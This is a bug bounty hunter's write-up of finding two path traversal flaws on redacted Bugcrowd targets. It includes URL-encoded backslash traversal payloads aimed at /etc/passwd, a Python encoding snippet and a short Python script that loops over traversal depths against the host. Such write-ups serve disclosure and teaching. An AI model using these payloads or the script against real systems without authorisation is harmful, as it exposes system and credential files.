Hello guys,
This is Anil, back with another write-up on my bug-hunting adventures. Here I am sharing a few of my findings from one of the Bugcrowd private programs.
At Nullcon 2020, I met my fellow bug bounty hunters and we had a discussion about bugs. They shared their experiences, and I was motivated by them, because I had not done any bug hunting for the last few months.
After Nullcon 2020 I came back and planned to do some bug hunting. Then I recollected a bug which I had found earlier but could not exploit. So I started with it again at 7:30 in the evening, doing recon and trying to exploit it. However, by 10:30 PM I still could not find any way to exploit it, and I was frustrated like hell. Then I got a conference call from Eldho, Nesooh and Abdulali, and we talked about some of our future plans in YAS and many other things. I told them about my situation, and they told me to drop that target and pick a new one.

So, I opened my Bugcrowd account and checked the program invitations, and there were some new targets. I chose one of them, and when I checked the program there were no vulnerabilities reported so far. I was like, “Okay, I will hunt this!”. I checked the scope; there were two wildcard scope domains. I took both, ran Sublist3r against both targets and saved the results for further recon. From the first domain I randomly took one subdomain (let’s call it https://abc.redact.com). When I checked the domain it looked like a static web page, so I ran dirsearch and, at the same time, a Burp Suite spider too. All I got was https://abc.redact.com/static/, and it looked the same as the index page.
I tried some basic recon and tested for open redirects, XSS and so on, but could not find anything.

Then I just tried https://abc.redact.com/static/../../ and it returned a 404 error page, so I changed the payload to https://abc.redact.com/static/\..\../ but got the same 404 error page.
What if I URL-encoded the payload?

I tried https://abc.redact.com/static/%5c..%5c..%5c/ and checked the response. Bingooooo!! It was a blank page. I had read about the exact same behaviour in another write-up where the author was attempting path traversal.
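For clarity, here is a minimal sketch of how that payload can be URL-encoded, assuming Python's standard library and the placeholder URL used in this write-up (the backslashes become %5C, while the dots are left as-is; %5C and %5c are equivalent):

from urllib.parse import quote

# Raw Windows-style traversal sequence: \..\..\
payload = "\\..\\..\\"

# quote() percent-encodes the backslashes and leaves the dots alone
encoded = quote(payload)          # -> '%5C..%5C..%5C'

# Placeholder subdomain from this write-up
print(f"https://abc.redact.com/static/{encoded}/")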
Path Traversal Vulnerability
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

Normally, when we test for path traversal, we try to find a dynamic parameter that fetches files and use it to reach outside of the web root folder:
http://examplesite.com/get-files.jsp?file=events.pdf
http://examplesite.com/get-page.php?home=abc.html
http://examplesite.com/some-page.asp?page=index.html
or we can also try it without a dynamic parameter:
http://examplesite.com/../../../../some dir/some file
In my case the web app did not have any dynamic parameters, but /static/ was vulnerable to path traversal, so I went with the second method. Now the task was to reach a sensitive file, such as /etc/passwd, via the traversal. So, I started looking for /etc/passwd.
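In practice I escalated the payload by hand, but as a rough sketch (assuming the placeholder URL above and the Python requests library), this kind of depth search could be scripted like so:

import requests

BASE = "https://abc.redact.com/static/"   # placeholder host from this write-up
STEP = "%5c.."                            # URL-encoded '\..' traversal step
TARGET = "%5cetc/passwd"                  # file we hope to reach

# Add one traversal step at a time until the response looks like /etc/passwd
for depth in range(1, 16):
    url = BASE + STEP * depth + TARGET
    resp = requests.get(url, timeout=10)
    if resp.status_code == 200 and "root:" in resp.text:
        print(f"[+] Traversal worked at depth {depth}: {url}")
        break
    print(f"[-] depth {depth}: HTTP {resp.status_code}")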
When I reached this point
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
it again threw a 404 error page, so I added one more %5c and continued the search for /etc/passwd. Finally:

NB: This is not the real /etc/passwd file, for privacy reasons.
By then it was 01:00 AM, the call was still going on, and I told them I had found the path traversal; all of us were excited. Then I wrote a report and submitted it.

I did not stop my recon there. I did recon on the other subdomains, but could not find anything, so I moved to the other domain. I opened the previously saved subdomain list from Sublist3r and started to recon them one by one. Let’s call one of them https://xyz.redact2.com. I ran dirsearch and got a directory called /client/, which I spidered with Burp and found one more directory. I used the same method as on the last domain, and it ended up as one more path traversal. The time was 04:00 AM; I made a report and submitted that too.


Timeline
First Report
Initial Report: 12 Mar 2020, 01:30 AM
Triaged: 12 Mar 2020, 09:28 AM
Accepted: 12 Mar 2020, 04:58 PM
Bounty Awarded: 12 Mar 2020, 04:59 PM ($2,100)
Second Report
Initial Report: 12 Mar 2020, 04:05 AM
Triaged: 12 Mar 2020, 09:36 AM
Accepted: 12 Mar 2020, 05:12 PM
Bounty Awarded: 20 Mar 2020, 09:45 PM ($2,100)
Thanks for reading my write-up. I hope you enjoyed it.